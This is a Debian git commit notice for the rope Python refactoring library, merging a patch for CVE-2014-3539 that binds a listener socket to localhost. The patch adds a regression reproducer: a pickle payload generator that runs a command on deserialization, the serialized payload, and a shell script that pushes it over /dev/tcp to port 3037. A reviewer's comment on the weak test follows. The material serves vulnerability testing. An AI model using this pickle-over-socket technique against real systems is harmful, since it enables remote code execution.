[Python-modules-commits] [rope] 04/11: merge patched-debian-experimental into debian-experimental
Arnaud Fontaine
arnau at moszumanska.debian.org
Thu Apr 13 08:52:43 UTC 2017
This is an automated email from the git hooks/post-receive script.
arnau pushed a commit to branch debian-experimental
in repository rope.
commit eab3579edf69be0e6f643408fb555a19e1975556
Merge: 78f7d39 da4b327
Author: Arnaud Fontaine <arnau at debian.org>
Date: Thu Apr 13 17:33:46 2017 +0900
merge patched-debian-experimental into debian-experimental
PKG-INFO | 20 +-
README.rst | 14 +-
debian/.git-dpm | 6 +-
debian/patches/CVE-2014-3539.patch | 10 +-
docs/overview.rst | 123 +++++++
docs/rope.rst | 1 +
PKG-INFO => rope.egg-info/PKG-INFO | 20 +-
rope.egg-info/SOURCES.txt | 141 ++++++++
rope.egg-info/dependency_links.txt | 1 +
rope.egg-info/top_level.txt | 1 +
rope/__init__.py | 3 +-
rope/base/astutils.py | 3 +
rope/base/builtins.py | 24 +-
rope/base/codeanalyze.py | 32 +-
rope/base/default_config.py | 23 +-
rope/base/evaluate.py | 7 +-
rope/base/fscommands.py | 21 +-
rope/base/oi/doa.py | 4 +-
rope/base/oi/runmod.py | 29 +-
rope/base/oi/soi.py | 31 +-
rope/base/oi/type_hinting/__init__.py | 0
rope/base/oi/type_hinting/evaluate.py | 353 +++++++++++++++++++
rope/base/oi/type_hinting/factory.py | 70 ++++
rope/base/oi/type_hinting/interfaces.py | 25 ++
rope/base/oi/type_hinting/providers/__init__.py | 0
rope/base/oi/type_hinting/providers/composite.py | 59 ++++
rope/base/oi/type_hinting/providers/docstrings.py | 193 ++++++++++
rope/base/oi/type_hinting/providers/inheritance.py | 66 ++++
rope/base/oi/type_hinting/providers/interfaces.py | 37 ++
.../oi/type_hinting/providers/numpydocstrings.py | 41 +++
.../providers/pep0484_type_comments.py | 42 +++
rope/base/oi/type_hinting/resolvers/__init__.py | 0
rope/base/oi/type_hinting/resolvers/composite.py | 22 ++
rope/base/oi/type_hinting/resolvers/interfaces.py | 10 +
rope/base/oi/type_hinting/resolvers/types.py | 16 +
rope/base/oi/type_hinting/utils.py | 136 ++++++++
rope/base/project.py | 15 +-
rope/base/pyobjects.py | 2 +-
rope/base/pyobjectsdef.py | 47 ++-
rope/base/stdmods.py | 25 +-
rope/base/{utils.py => utils/__init__.py} | 19 +-
rope/base/utils/datastructures.py | 67 ++++
rope/base/utils/pycompat.py | 45 +++
rope/contrib/finderrors.py | 2 +-
rope/contrib/fixsyntax.py | 2 +-
rope/refactor/extract.py | 28 +-
rope/refactor/importutils/__init__.py | 9 +-
rope/refactor/importutils/module_imports.py | 81 +++--
rope/refactor/move.py | 140 ++++++--
rope/refactor/occurrences.py | 20 +-
rope/refactor/patchedast.py | 105 ++++--
rope/refactor/suites.py | 21 +-
ropetest/__init__.py | 7 +-
ropetest/advanced_oi_test.py | 14 +-
ropetest/builtinstest.py | 5 +-
ropetest/codeanalyzetest.py | 30 +-
ropetest/contrib/__init__.py | 5 +-
ropetest/contrib/autoimporttest.py | 5 +-
ropetest/contrib/changestacktest.py | 6 +-
ropetest/contrib/codeassisttest.py | 6 +-
ropetest/contrib/finderrorstest.py | 6 +-
ropetest/contrib/fixmodnamestest.py | 6 +-
ropetest/objectdbtest.py | 6 +-
ropetest/objectinfertest.py | 9 +-
ropetest/projecttest.py | 18 +-
ropetest/pycoretest.py | 33 +-
ropetest/pyscopestest.py | 5 +-
ropetest/refactor/extracttest.py | 59 +++-
ropetest/refactor/importutilstest.py | 76 +++-
ropetest/refactor/movetest.py | 123 ++++++-
ropetest/refactor/multiprojecttest.py | 10 +-
ropetest/refactor/patchedasttest.py | 168 ++++++++-
ropetest/refactor/renametest.py | 5 +-
ropetest/refactor/restructuretest.py | 5 +-
ropetest/refactor/similarfindertest.py | 9 +-
ropetest/refactor/suitestest.py | 5 +-
ropetest/runmodtest.py | 8 +-
ropetest/simplifytest.py | 5 +-
ropetest/testutils.py | 9 +-
ropetest/type_hinting_test.py | 387 +++++++++++++++++++++
setup.cfg | 5 +
setup.py | 33 +-
82 files changed, 2959 insertions(+), 321 deletions(-)
diff --cc debian/.git-dpm
index 1b025f4,0000000..b3a9538
mode 100644,000000..100644
--- a/debian/.git-dpm
+++ b/debian/.git-dpm
@@@ -1,11 -1,0 +1,11 @@@
+# see git-dpm(1) from git-dpm package
- 7f19bb6d79d2426f4b29e531f12116398efce357
- 7f19bb6d79d2426f4b29e531f12116398efce357
- 835afd55ba93a1632462d454b5be0985b6ca9794
++da4b3278b40a1cf16798771e5b67d918d8693393
++da4b3278b40a1cf16798771e5b67d918d8693393
++0d2c73dafa27bdee016a7008b8f15afec48ffe20
+0d2c73dafa27bdee016a7008b8f15afec48ffe20
+rope_0.10.5.orig.tar.gz
+9e4dd71acbdd45cbaf3d6493c2298d1e1d5f786c
+243931
+debianTag="debian/%e%v"
+patchedTag="patched/%e%v"
+upstreamTag="upstream/%e%u"
diff --cc debian/patches/CVE-2014-3539.patch
index 8b24509,0000000..9bb6f16
mode 100644,000000..100644
--- a/debian/patches/CVE-2014-3539.patch
+++ b/debian/patches/CVE-2014-3539.patch
@@@ -1,215 -1,0 +1,215 @@@
- From 7f19bb6d79d2426f4b29e531f12116398efce357 Mon Sep 17 00:00:00 2001
++From da4b3278b40a1cf16798771e5b67d918d8693393 Mon Sep 17 00:00:00 2001
+From: Arnaud Fontaine <arnau at debian.org>
+Date: Thu, 26 Jan 2017 13:38:11 +0900
+Subject: =?UTF-8?q?Mitigations=20for=20CVE-2014-3539=20from=20the=20upstre?=
+ =?UTF-8?q?am=20author=20personal=20repository=0A(https://github.com/mcepl?=
+ =?UTF-8?q?/rope):?=
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+ commit a2ea5f98d18ed037090afb048a48f87b515ff8dc
+ Author: Matěj Cepl <mcepl at cepl.eu>
+ Date: Tue Feb 10 12:34:20 2015 +0100
+
+ Just add reporter’s suggested reproducer
+
+ commit a6cb534debe9aff623b6b19ae2dedbf872069a50
+ Author: Matej Cepl <mcepl at cepl.eu>
+ Date: Thu Feb 12 01:12:15 2015 +0100
+
+ limit socket connections to localhost
+
+Patch-Name: CVE-2014-3539.patch
+---
+ rope/base/oi/doa.py | 2 +-
+ ropetest/CVE20143539/CVE-2014-3539.py | 18 ++++++++++++++++++
+ ropetest/CVE20143539/README.md | 17 +++++++++++++++++
+ ropetest/CVE20143539/__init__.py | 32 ++++++++++++++++++++++++++++++++
+ ropetest/CVE20143539/generate_payload.py | 8 ++++++++
+ ropetest/CVE20143539/payload.txt | 9 +++++++++
+ ropetest/CVE20143539/project/hello.py | 1 +
+ ropetest/CVE20143539/run_reproducer.sh | 11 +++++++++++
+ ropetest/__init__.py | 3 +++
+ 9 files changed, 100 insertions(+), 1 deletion(-)
+ create mode 100644 ropetest/CVE20143539/CVE-2014-3539.py
+ create mode 100644 ropetest/CVE20143539/README.md
+ create mode 100644 ropetest/CVE20143539/__init__.py
+ create mode 100644 ropetest/CVE20143539/generate_payload.py
+ create mode 100644 ropetest/CVE20143539/payload.txt
+ create mode 100644 ropetest/CVE20143539/project/hello.py
+ create mode 100644 ropetest/CVE20143539/run_reproducer.sh
+
+diff --git a/rope/base/oi/doa.py b/rope/base/oi/doa.py
- index de45902..ed44d25 100644
++index 3f314c6..65e3e26 100644
+--- a/rope/base/oi/doa.py
++++ b/rope/base/oi/doa.py
+@@ -116,7 +116,7 @@ class _SocketReceiver(_MessageReceiver):
+ self.data_port = 3037
+ while self.data_port < 4000:
+ try:
+- self.server_socket.bind(('', self.data_port))
++ self.server_socket.bind(('127.0.0.1', self.data_port))
+ break
+ except socket.error:
+ self.data_port += 1
+diff --git a/ropetest/CVE20143539/CVE-2014-3539.py b/ropetest/CVE20143539/CVE-2014-3539.py
+new file mode 100644
+index 0000000..5dd37e1
+--- /dev/null
++++ b/ropetest/CVE20143539/CVE-2014-3539.py
+@@ -0,0 +1,18 @@
++#!/usr/bin/env python
++# CVE-2014-3539 reproducer/exploit
++# Vasyl Kaigorodov <vkaigoro at redhat.com>
++# Tested on Python 2.7.x
++
++import sys
++from rope.base import project
++
++try:
++ open('payload.txt', 'r')
++except IOError:
++ print("payload.txt not found, run:")
++ print("\tpython generate_payload.py")
++ sys.exit(1)
++
++myproject = project.Project('project/')
++res = myproject.get_resource("hello.py")
++myproject.pycore.run_module(res)
+diff --git a/ropetest/CVE20143539/README.md b/ropetest/CVE20143539/README.md
+new file mode 100644
+index 0000000..5c620ef
+--- /dev/null
++++ b/ropetest/CVE20143539/README.md
+@@ -0,0 +1,17 @@
++== List of files ==
++
++project/ - directory containing an example python module
++CVE-2014-3539.py - python script which tries to load an example python module
++ for re-factoring (normal workflow simulation)
++generate_payload.py - generates payload.txt (evil code to run)
++payload.txt - example payload (running /bin/uptime)
++run_reproducer.sh - main file that sticks above together
++
++== Usage ==
++
++Run ./run_reproducer.sh.
++If the system is vulnerable, you'll see the output similar to below:
++
++ $ ./run_reproducer.sh
++ SUCCESS: 15:13:46 up 21:26, 2 users, load average: 0.02, 0.63, 1.01
++
+diff --git a/ropetest/CVE20143539/__init__.py b/ropetest/CVE20143539/__init__.py
+new file mode 100644
+index 0000000..3ab3be6
+--- /dev/null
++++ b/ropetest/CVE20143539/__init__.py
+@@ -0,0 +1,32 @@
++import os.path
++import subprocess
++try:
++ import unittest2 as unittest
++except ImportError:
++ import unittest
++
++
++class TestCVE20143539(unittest.TestCase):
++ def test_case(self):
++ cur_dir = os.path.dirname(__file__)
++ script_name = os.path.join(cur_dir, 'run_reproducer.sh')
++ pid = subprocess.Popen([script_name], stdout=subprocess.PIPE,
++ stderr=subprocess.PIPE, cwd=cur_dir)
++ pid.communicate()
++ self.assertEquals(pid.returncode, 0)
++
++
++def suite():
++ result = unittest.TestSuite()
++ result.addTests(unittest.makeSuite(TestCVE20143539))
++ return result
++
++
++if __name__ == '__main__':
++ import sys
++ if len(sys.argv) > 1:
++ unittest.main()
++ else:
++ runner = unittest.TextTestRunner()
++ res = runner.run(suite())
++ sys.exit(not res.wasSuccessful())
+diff --git a/ropetest/CVE20143539/generate_payload.py b/ropetest/CVE20143539/generate_payload.py
+new file mode 100644
+index 0000000..c8d3e01
+--- /dev/null
++++ b/ropetest/CVE20143539/generate_payload.py
+@@ -0,0 +1,8 @@
++import cPickle
++import subprocess
++
++class RunBinSh(object):
++ def __reduce__(self):
++ return (subprocess.Popen, (('/bin/uptime',),))
++
++open('payload.txt', 'w').write(cPickle.dumps(RunBinSh()))
+diff --git a/ropetest/CVE20143539/payload.txt b/ropetest/CVE20143539/payload.txt
+new file mode 100644
+index 0000000..434dd0f
+--- /dev/null
++++ b/ropetest/CVE20143539/payload.txt
+@@ -0,0 +1,9 @@
++csubprocess
++Popen
++p1
++((S'/bin/uptime'
++p2
++tp3
++tp4
++Rp5
++.
+\ No newline at end of file
+diff --git a/ropetest/CVE20143539/project/hello.py b/ropetest/CVE20143539/project/hello.py
+new file mode 100644
+index 0000000..7df869a
+--- /dev/null
++++ b/ropetest/CVE20143539/project/hello.py
+@@ -0,0 +1 @@
++print("Hello, World!")
+diff --git a/ropetest/CVE20143539/run_reproducer.sh b/ropetest/CVE20143539/run_reproducer.sh
+new file mode 100644
+index 0000000..b1f7fac
+--- /dev/null
++++ b/ropetest/CVE20143539/run_reproducer.sh
+@@ -0,0 +1,11 @@
++#!/bin/bash
++export PYTHONPATH=$(readlink -f ../..):$PYTHONPATH
++trap "killall -- $(basename $0)" EXIT
++
++(while : ; do
++ ( cat payload.txt > /dev/tcp/0.0.0.0/3037; ) &>/dev/null \
++ && echo -n "SUCCESS: "
++done)&
++
++python CVE-2014-3539.py 2>/dev/null
++exit $?
+diff --git a/ropetest/__init__.py b/ropetest/__init__.py
- index f1cb459..744beee 100644
++index 699f8c6..d2e3aaf 100644
+--- a/ropetest/__init__.py
++++ b/ropetest/__init__.py
- @@ -16,6 +16,8 @@ import ropetest.simplifytest
++@@ -20,6 +20,8 @@ import ropetest.simplifytest
+ import ropetest.contrib
+ import ropetest.refactor
+
++import ropetest.CVE20143539
++
+
+ def suite():
+ result = unittest.TestSuite()
- @@ -33,6 +35,7 @@ def suite():
++@@ -38,6 +40,7 @@ def suite():
+
+ result.addTests(ropetest.refactor.suite())
+ result.addTests(ropetest.contrib.suite())
++ result.addTests(ropetest.CVE20143539.suite())
+
+ return result
+
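Review bot: The regression test in the embedded `ropetest/CVE20143539/__init__.py` does not check the mitigation: `test_case` discards the captured output and asserts only `pid.returncode == 0`, which is the exit status of `python CVE-2014-3539.py`, so it passes whether or not the payload was delivered. Keep the output and assert on it, for example `out, _ = pid.communicate()` followed by `self.assertNotIn(b'SUCCESS', out)`. Be aware that `run_reproducer.sh` connects from the same host, so with the listener bound to `'127.0.0.1'` that assertion will probably still fail; the bind change in `doa.py` closes the remote path only, and any local process can still reach ports 3037–3999. The code in `_SocketReceiver` that reads from the socket is outside this hunk, so whether the data is authenticated before it is deserialised cannot be confirmed here and should be checked.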
--
Alioth's /usr/local/bin/git-commit-notice on /srv/git.debian.org/git/python-modules/packages/rope.git